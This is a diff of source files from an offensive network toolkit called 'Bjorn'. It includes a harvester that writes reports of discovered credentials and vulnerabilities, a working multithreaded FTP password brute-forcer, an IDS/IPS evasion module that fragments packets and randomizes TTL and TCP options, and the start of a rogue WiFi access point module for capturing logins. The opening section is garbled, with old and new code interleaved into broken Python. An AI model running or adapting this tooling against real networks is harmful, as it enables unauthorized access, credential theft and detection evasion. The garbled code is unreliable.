os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
def generate_reports(self):
"""Generate reports in all specified formats."""
os.makedirs(self.output_dir, exist_ok=True)
if 'json' in self.formats: for cat in categories:
self.generate_json_report() cat_path = os.path.join(input_dir, cat)
if 'html' in self.formats: if not os.path.exists(cat_path): continue
self.generate_html_report()
if 'md' in self.formats:
self.generate_markdown_report()
def start_watching(self):
"""Start watching for new data files."""
class FileHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, harvester):
self.harvester = harvester
def on_created(self, event): for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if event.is_directory: if os.path.getmtime(f_path) > self.last_scan_time:
return try:
if event.src_path.endswith('.json'): with open(f_path, 'r', encoding='utf-8') as f:
logging.info(f"New data file detected: {event.src_path}") finds = json.load(f)
self.harvester.collect_data() with self.lock:
self.harvester.generate_reports() self.data[cat].append(finds)
new_findings += 1
self.observer = watchdog.observers.Observer() except: pass
self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
self.observer.start()
try: if new_findings > 0:
while True: logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
time.sleep(1) self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
except KeyboardInterrupt:
self.observer.stop() self.last_scan_time = time.time()
self.observer.join()
def execute(self): def _generate_report(self, output_dir, fmt):
"""Execute the data collection and reporting process.""" """Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try: try:
logging.info("Starting data collection") while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
if self.clean: break
self.clean_directories()
self._collect_data(input_dir)
# Initial data collection and report generation self._generate_report(output_dir, fmt)
self.collect_data()
self.generate_reports() # Progress
elapsed = int(time.time() - start_time)
# Start watch mode if enabled prog = int((elapsed / timeout) * 100)
if self.watch_mode: self.shared_data.bjorn_progress = f"{prog}%"
logging.info("Starting watch mode for new data")
try: if not watch:
self.start_watching() break
except KeyboardInterrupt:
logging.info("Watch mode stopped by user") time.sleep(30) # Scan every 30s
finally:
if self.observer: self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
self.observer.stop()
self.observer.join()
logging.info("Data collection and reporting completed")
except Exception as e: except Exception as e:
logging.error(f"Error during execution: {e}") logger.error(f"FreyaHarvest error: {e}")
raise return "failed"
finally:
# Ensure observer is stopped if watch mode was active return "success"
if self.observer and self.observer.is_alive():
self.observer.stop()
self.observer.join()
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
harvester.execute()
if __name__ == "__main__": if __name__ == "__main__":
main() from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

View File

@@ -1,9 +1,9 @@
""" """
ftp_bruteforce.py FTP bruteforce (DB-backed, no CSV/JSON, no rich) ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur - Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts - IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp') - Succès -> DB.creds (service='ftp')
- Conserve la logique dorigine (queue/threads, sleep éventuels, etc.) - Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
""" """
import os import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
from shared import SharedData from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG) logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
@@ -27,7 +28,7 @@ b_parent = None
b_service = '["ftp"]' b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]' b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70 b_priority = 70
b_cooldown = 1800, # 30 minutes entre deux runs b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max b_rate_limit = '3/86400' # 3 fois par jour max
class FTPBruteforce: class FTPBruteforce:
@@ -43,22 +44,21 @@ class FTPBruteforce:
return self.ftp_bruteforce.run_bruteforce(ip, port) return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key): def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed').""" """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce" self.shared_data.bjorn_orch_status = "FTPBruteforce"
# comportement original : un petit délai visuel self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...") logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port) success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed' return 'success' if success else 'failed'
class FTPConnector: class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IP(MAC, Hostname).""" """Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
# Wordlists inchangées # Wordlists inchangées
self.users = self._read_lines(shared_data.users_file) self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file) self.passwords = self._read_lines(shared_data.passwords_file)
@@ -69,6 +69,7 @@ class FTPConnector:
self.lock = threading.Lock() self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port] self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue() self.queue = Queue()
self.progress = None
# ---------- util fichiers ---------- # ---------- util fichiers ----------
@staticmethod @staticmethod
@@ -112,10 +113,11 @@ class FTPConnector:
return self._ip_to_identity.get(ip, (None, None))[1] return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ---------- # ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool: def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try: try:
conn = FTP() conn = FTP()
conn.connect(adresse_ip, 21) conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password) conn.login(user, password)
try: try:
conn.quit() conn.quit()
@@ -171,14 +173,17 @@ class FTPConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get() adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try: try:
if self.ftp_connect(adresse_ip, user, password): if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock: with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port]) self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}") logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results() self.save_results()
self.removeduplicates() self.removeduplicates()
success_flag[0] = True success_flag[0] = True
finally: finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done() self.queue.task_done()
# Pause configurable entre chaque tentative FTP # Pause configurable entre chaque tentative FTP
@@ -187,46 +192,54 @@ class FTPConnector:
def run_bruteforce(self, adresse_ip: str, port: int): def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip) mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or "" hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1 # (logique d'origine conservée) dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
if len(self.users) * len(self.passwords) == 0: total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count): def run_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty(): for user in self.users:
if self.shared_data.orchestrator_should_exit: for password in passwords:
logger.info("Orchestrator exit signal received, stopping bruteforce.") if self.shared_data.orchestrator_should_exit:
while not self.queue.empty(): logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
try: return
self.queue.get_nowait() self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.task_done()
except Exception:
break
break
self.queue.join() threads = []
for t in threads: thread_count = min(8, max(1, phase_tasks))
t.join() for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ---------- # ---------- persistence DB ----------
def save_results(self): def save_results(self):
@@ -266,3 +279,4 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.error(f"Error: {e}") logger.error(f"Error: {e}")
exit(1) exit(1)

View File

@@ -1,318 +1,167 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.a #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -i, --interface Network interface to use (default: active interface). heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
# -m, --mode Operating mode (timing, random, fragmented, all). Handles packet fragmentation, timing randomization, and TTL manipulation.
# -d, --delay Base delay between operations in seconds (default: 1). Requires: scapy.
# -r, --randomize Randomization factor for timing (default: 0.5). """
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
import os import os
import json import json
import argparse
from datetime import datetime
import logging
import random import random
import time import time
import socket
import struct
import threading import threading
from scapy.all import * import datetime
from collections import deque from collections import deque
from typing import Any, Dict, List, Optional
# Configure logging try:
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard" b_class = "HeimdallGuard"
b_module = "heimdall_guard" b_module = "heimdall_guard"
b_enabled = 0 b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
# Default settings b_args = {
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth" "interface": {
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" "type": "text",
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json") "label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard: class HeimdallGuard:
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR): def __init__(self, shared_data):
self.interface = interface self.shared_data = shared_data
self.mode = mode
self.base_delay = base_delay
self.random_factor = random_factor
self.output_dir = output_dir
self.packet_queue = deque() self.packet_queue = deque()
self.active = False self.active = False
self.lock = threading.Lock() self.lock = threading.Lock()
# Statistics
self.stats = { self.stats = {
'packets_processed': 0, 'packets_processed': 0,
'packets_fragmented': 0, 'packets_fragmented': 0,
'timing_adjustments': 0 'timing_adjustments': 0
} }
def initialize_interface(self): def _fragment_packet(self, packet, mtu=1400):
"""Configure network interface for stealth operations.""" """Fragment IP packets to bypass strict IDS rules."""
try: if IP in packet:
# Disable NIC offloading features that might interfere with packet manipulation try:
commands = [
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
f"ethtool -K {self.interface} gro off", # Generic receive offload
f"ethtool -K {self.interface} lro off" # Large receive offload
]
for cmd in commands:
try:
subprocess.run(cmd.split(), check=True)
except subprocess.CalledProcessError:
logging.warning(f"Failed to execute: {cmd}")
logging.info(f"Interface {self.interface} configured for stealth operations")
return True
except Exception as e:
logging.error(f"Failed to initialize interface: {e}")
return False
def calculate_timing(self):
"""Calculate timing delays with randomization."""
base = self.base_delay
variation = self.random_factor * base
return max(0, base + random.uniform(-variation, variation))
def fragment_packet(self, packet, mtu=1500):
"""Fragment packets to avoid detection patterns."""
try:
if IP in packet:
# Fragment IP packets
frags = []
payload = bytes(packet[IP].payload) payload = bytes(packet[IP].payload)
header_length = len(packet) - len(payload) max_size = mtu - 40 # conservative
max_size = mtu - header_length frags = []
# Create fragments
offset = 0 offset = 0
while offset < len(payload): while offset < len(payload):
frag_size = min(max_size, len(payload) - offset) chunk = payload[offset:offset + max_size]
frag_payload = payload[offset:offset + frag_size] f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
# Create fragment packet f[IP].frag = offset // 8
frag = packet.copy() f[IP].payload = Raw(chunk)
frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0 frags.append(f)
frag[IP].frag = offset // 8 offset += max_size
frag[IP].payload = Raw(frag_payload)
frags.append(frag)
offset += frag_size
return frags return frags
return [packet]
except Exception as e:
logging.error(f"Error fragmenting packet: {e}")
return [packet]
def randomize_ttl(self, packet):
"""Randomize TTL values to avoid fingerprinting."""
if IP in packet:
ttl_values = [32, 64, 128, 255] # Common TTL values
packet[IP].ttl = random.choice(ttl_values)
return packet
def modify_tcp_options(self, packet):
"""Modify TCP options to avoid fingerprinting."""
if TCP in packet:
# Common window sizes
window_sizes = [8192, 16384, 32768, 65535]
packet[TCP].window = random.choice(window_sizes)
# Randomize TCP options
tcp_options = []
# MSS option
mss_values = [1400, 1460, 1440]
tcp_options.append(('MSS', random.choice(mss_values)))
# Window scale
if random.random() < 0.5:
tcp_options.append(('WScale', random.randint(0, 14)))
# SACK permitted
if random.random() < 0.5:
tcp_options.append(('SAckOK', ''))
packet[TCP].options = tcp_options
return packet
def process_packet(self, packet):
"""Process a packet according to stealth settings."""
processed_packets = []
try:
if self.mode in ['all', 'fragmented']:
fragments = self.fragment_packet(packet)
processed_packets.extend(fragments)
self.stats['packets_fragmented'] += len(fragments) - 1
else:
processed_packets.append(packet)
# Apply additional stealth techniques
final_packets = []
for pkt in processed_packets:
pkt = self.randomize_ttl(pkt)
pkt = self.modify_tcp_options(pkt)
final_packets.append(pkt)
self.stats['packets_processed'] += len(final_packets)
return final_packets
except Exception as e:
logging.error(f"Error processing packet: {e}")
return [packet]
def send_packet(self, packet):
"""Send packet with timing adjustments."""
try:
if self.mode in ['all', 'timing']:
delay = self.calculate_timing()
time.sleep(delay)
self.stats['timing_adjustments'] += 1
send(packet, iface=self.interface, verbose=False)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def packet_processor_thread(self):
"""Process packets from the queue."""
while self.active:
try:
if self.packet_queue:
packet = self.packet_queue.popleft()
processed_packets = self.process_packet(packet)
for processed in processed_packets:
self.send_packet(processed)
else:
time.sleep(0.1)
except Exception as e: except Exception as e:
logging.error(f"Error in packet processor thread: {e}") logger.debug(f"Fragmentation error: {e}")
return [packet]
def start(self): def _apply_stealth(self, packet):
"""Start stealth operations.""" """Randomize TTL and TCP options."""
if not self.initialize_interface(): if IP in packet:
return False packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True self.active = True
self.processor_thread = threading.Thread(target=self.packet_processor_thread) start_time = time.time()
self.processor_thread.start()
return True
def stop(self):
"""Stop stealth operations."""
self.active = False
if hasattr(self, 'processor_thread'):
self.processor_thread.join()
self.save_stats()
def queue_packet(self, packet):
"""Queue a packet for processing."""
self.packet_queue.append(packet)
def save_stats(self):
"""Save operation statistics."""
try: try:
os.makedirs(self.output_dir, exist_ok=True) while time.time() - start_time < timeout:
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S") if self.shared_data.orchestrator_should_exit:
break
stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump({
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'mode': self.mode,
'stats': self.stats
}, f, indent=4)
logging.info(f"Statistics saved to {stats_file}") # In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
except Exception as e: return "success"
logging.error(f"Failed to save statistics: {e}")
def save_settings(interface, mode, base_delay, random_factor, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"mode": mode,
"base_delay": base_delay,
"random_factor": random_factor,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Stealth operations module")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
default='all', help="Operating mode")
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
mode = args.mode or settings.get("mode")
base_delay = args.delay or settings.get("base_delay")
random_factor = args.randomize or settings.get("random_factor")
output_dir = args.output or settings.get("output_dir")
if not interface:
interface = conf.iface
logging.info(f"Using default interface: {interface}")
save_settings(interface, mode, base_delay, random_factor, output_dir)
guard = HeimdallGuard(
interface=interface,
mode=mode,
base_delay=base_delay,
random_factor=random_factor,
output_dir=output_dir
)
try:
if guard.start():
logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Heimdall Guard...")
guard.stop()
if __name__ == "__main__": if __name__ == "__main__":
main() from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")

View File

@@ -1,467 +1,257 @@
# WiFi deception tool for creating malicious access points and capturing authentications. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -i, --interface Wireless interface for AP creation (default: wlan0). loki_deceiver.py -- WiFi deception tool for BJORN.
# -s, --ssid SSID for the fake access point (or target to clone). Creates rogue access points and captures authentications/handshakes.
# -c, --channel WiFi channel (default: 6). Requires: hostapd, dnsmasq, airmon-ng.
# -p, --password Optional password for WPA2 AP. """
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
import os import os
import json import json
import argparse
from datetime import datetime
import logging
import subprocess import subprocess
import signal
import time
import threading import threading
import scapy.all as scapy import time
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver" b_class = "LokiDeceiver"
b_module = "loki_deceiver" b_module = "loki_deceiver"
b_enabled = 0 b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
b_name = "Loki Deceiver"
b_description = "Creates a rogue access point to capture WiFi authentications and perform MITM."
b_author = "Bjorn Team"
b_version = "2.0.2"
b_icon = "LokiDeceiver.png"
# Configure logging b_args = {
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') "interface": {
"type": "text",
# Default settings "label": "Wireless Interface",
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi" "default": "wlan0"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" },
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json") "ssid": {
"type": "text",
"label": "AP SSID",
"default": "Bjorn_Free_WiFi"
},
"channel": {
"type": "number",
"label": "Channel",
"min": 1,
"max": 14,
"default": 6
},
"password": {
"type": "text",
"label": "WPA2 Password (Optional)",
"default": ""
}
}
class LokiDeceiver: class LokiDeceiver:
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR): def __init__(self, shared_data):
self.interface = interface self.shared_data = shared_data
self.ssid = ssid self.hostapd_proc = None
self.channel = channel self.dnsmasq_proc = None
self.password = password self.tcpdump_proc = None
self.output_dir = output_dir self._sniffer = None
self.active_clients = set()
self.original_mac = None self.stop_event = threading.Event()
self.captured_handshakes = []
self.captured_credentials = []
self.active = False
self.lock = threading.Lock() self.lock = threading.Lock()
